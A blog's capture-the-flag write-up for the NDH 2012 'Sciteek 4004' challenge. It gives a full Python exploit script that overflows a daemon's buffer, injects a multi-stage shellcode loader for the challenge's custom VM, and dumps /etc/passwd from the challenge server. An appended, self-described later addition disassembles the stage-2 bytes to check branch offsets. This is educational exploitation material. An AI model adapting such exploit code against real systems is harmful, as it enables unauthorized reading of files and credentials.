codezen.fr code hacking, zen coding

26 Mar 2012

NDH 2012 Prequals – Sciteek 4004 Write-up – Multistage file reader

Posted by aXs

The daemon on port 4004 is a fairly simple daemon that checks for a password (hard-coded in the binary) and just says "You are authenticated".

What's interesting is that this daemon runs on the same server as many other challenges, so we used it to fetch files and solve the URL Shortener challenge more easily by retrieving its Python source.

We have limited space for the shellcode: only 100 bytes. While you can certainly read files with a 100-byte shellcode if you don't care about error checking, I wanted something cleaner (that's the excuse for spending time on a multi-stage exploit loader).

This exploit will:
- Overflow the buffer (size is 0x100)
- Inject the stage 1 loader
- Read stage 2 from stdin
- Execute stage 2
- Read the filename to dump from stdin
- Open the file with error checking
- Dump the file using a read/write loop, so you can dump files bigger than memory
- Exit

#!/usr/bin/env python

import socket
import sys
import time
from struct import pack

if len(sys.argv) != 4:
  print '\nUsage:\t./sciteek4004.py [host] [port] [filename]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

data = s.recv(65536)
print 'Received', repr(data)

''' Stage 2 '''
''' Read filename from stdin, output to stdout '''

sc  = "\x04\x02\x01\x00\x00"  # movl r1, 0x0
sc += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
sc += "\x04\x02\x02\x94\x7a"  # movl r2, 0x7b94
sc += "\x04\x02\x03\x32\x00"  # movl r3, 0x32
sc += "\x30"      # syscall (read)

sc += "\x04\x02\x00\x02\x00"  # movl r0, 0x2
sc += "\x04\x02\x01\x94\x7a"  # movl r1, 0x7b94
sc += "\x04\x02\x02\x00\x00"  # movl r2, 0x0
sc += "\x04\x00\x03\x02"  # mov r3, r2
sc += "\x30"      # syscall (open)

sc += "\x18\x02\x00\xff\xff"  # cmpl r0, 0xffff
sc += "\x10\x39\x00"    # jz +57

sc += "\x04\x00\x07\x00"  # mov r7, r0

sc += "\x04\x00\x01\x00"  # mov r1, r0
sc += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
sc += "\x04\x02\x02\x00\x10"  # movl r2, 0x1000
sc += "\x04\x02\x03\xff\x00"  # movl r3, 0xff
sc += "\x30"      # syscall (read)

sc += "\x18\x01\x00\x00"  # cmpl r0, 0x0
sc += "\x10\x1a\x00"    # jz +26

sc += "\x04\x00\x03\x00"  # mov r3, r0
sc += "\x04\x02\x00\x04\x00"  # movl r0, 0x4
sc += "\x04\x02\x01\x01\x00"  # movl r1, 0x1
sc += "\x04\x02\x02\x00\x10"  # movl r2, 0x1000
sc += "\x30"      # syscall (write)

sc += "\x04\x00\x00\x07"  # mov r0, r7

sc += "\x16\xc7"    # jmps -57 (0xc7 as a signed byte), back to "mov r7, r0"

sc += "\x04\x02\x00\x01\x00"  # movl r0, 0x1
sc += "\x30"      # syscall (exit)

''' Stage 1 Loader '''

loader  = "\x04\x02\x01\x00\x00"  # movl r1, 0x0
loader += "\x04\x02\x00\x03\x00"  # movl r0, 0x3
loader += "\x04\x02\x02\x00\x60"  # movl r2, 0x6000
loader += "\x04\x02\x03"    # movl r3, len(sc)
loader += pack("<H", len(sc))   #   -continued (16-bit little-endian length of stage 2)
loader += "\x30"      # syscall (read)
loader += "\x04\x02\x00\x00\x60"  # movl r0, 0x6000
loader += "\x19\x03\x00"    # call *r0

if len(loader) > 100:
  print "\nShellcode too long: ", len(loader), "\n"
  sys.exit(1)

print "Shellcode size: ", len(loader), "\n"

payload = '\x02' * (100 - len(loader)) # Nopsled

print "Nopsled size: ", len(payload), "\n"

payload += loader

payload += "\x94\x7f" # To Nopsled

print "Payload size: ", len(payload), "\n"

# Send Stage 1 Loader

s.send(payload)

time.sleep(2)

# Send Stage 2

s.send(sc)

time.sleep(2)

# Send filename to download

s.send(sys.argv[3] + "\x00\n")

while 1:
    line = s.recv(65536)
    if not line:
        break
    print line

s.close()

Result (each 0xff-byte read chunk is printed as its own line by the script, which is why the lp entry is split across two lines):

$ python sciteek4004.py sciteek.nuitduhack.com 4004 "/etc/passwd"
Received 'Password (required): '
Shellcode size: 29

Nopsled size: 71

Payload size: 102

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spo
ol/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin

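To check the branch displacements in the hand-assembled stage 2 above, here is an added Python 3 decoder; it is not part of the original write-up. Its opcode table is an assumption inferred from the byte/mnemonic pairs in the comments above and covers only the instruction forms used there; jz/jmps displacements are assumed relative to the end of the branch instruction, which is the convention under which all three branches land on instruction boundaries.

```python
import struct
# Opcode table INFERRED from the write-up's byte/mnemonic comments (an assumption,
# not an official Sciteek ISA reference). 0x04 mov / 0x18 cmp / 0x19 call share the
# layout [op][sub][reg][operand]: sub 0x02 = 16-bit LE imm, 0x01 = 8-bit imm, 0x00 = reg, 0x03 = *reg
WIDE = {0x04: "mov", 0x18: "cmp", 0x19: "call"}

def decode(code, off):
    """Decode one instruction at `off`: returns (length, text, branch_target)."""
    op = code[off]
    if op == 0x30:
        return 1, "syscall", None
    if op in (0x10, 0x16):  # jz rel16 / jmps rel8, relative to the next instruction
        n, fmt, name = (3, "<h", "jz") if op == 0x10 else (2, "<b", "jmps")
        rel = struct.unpack_from(fmt, code, off + 1)[0]
        return n, "%s %+d" % (name, rel), off + n + rel
    if op not in WIDE:
        raise ValueError("unknown opcode 0x%02x at offset %d" % (op, off))
    name, sub, reg = WIDE[op], code[off + 1], code[off + 2]
    if sub == 0x03:
        return 3, "%s *r%d" % (name, reg), None
    if sub == 0x02:
        return 5, "%sl r%d, 0x%x" % (name, reg, struct.unpack_from("<H", code, off + 3)[0]), None
    if sub in (0x00, 0x01):
        return 4, ("%s r%d, r%d" if sub == 0 else "%sb r%d, 0x%x") % (name, reg, code[off + 3]), None
    raise ValueError("unknown sub-opcode 0x%02x at offset %d" % (sub, off))

def disasm(code):
    """Linear sweep: returns [(offset, text)] and {branch_offset: target_offset}."""
    listing, targets, off = [], {}, 0
    while off < len(code):
        n, text, target = decode(code, off)
        listing.append((off, text))
        if target is not None:
            targets[off] = target
        off += n
    return listing, targets

def branch_targets_valid(code):
    """True when every jz/jmps lands on an instruction boundary (or exactly at code end)."""
    listing, targets = disasm(code)
    starts = {o for o, _ in listing} | {len(code)}
    return all(t in starts for t in targets.values())

# Stage 2 exactly as assembled in the write-up above (same bytes, one instruction per group).
STAGE2 = bytes.fromhex(
    "0402010000 0402000300 040202947a 0402033200 30"
    "0402000200 040201947a 0402020000 04000302 30 180200ffff 103900 04000700"
    "04000100 0402000300 0402020010 040203ff00 30 18010000 101a00 04000300"
    "0402000400 0402010100 0402020010 30 04000007 16c7 0402000100 30")
```

Running `disasm(STAGE2)` lists the 30 instructions with their offsets; `branch_targets_valid(STAGE2)` confirms that jz +57, jz +26 and jmps -57 all resolve to instruction boundaries (offsets 106, 106 and 49), whereas a displacement of -47 would land mid-instruction.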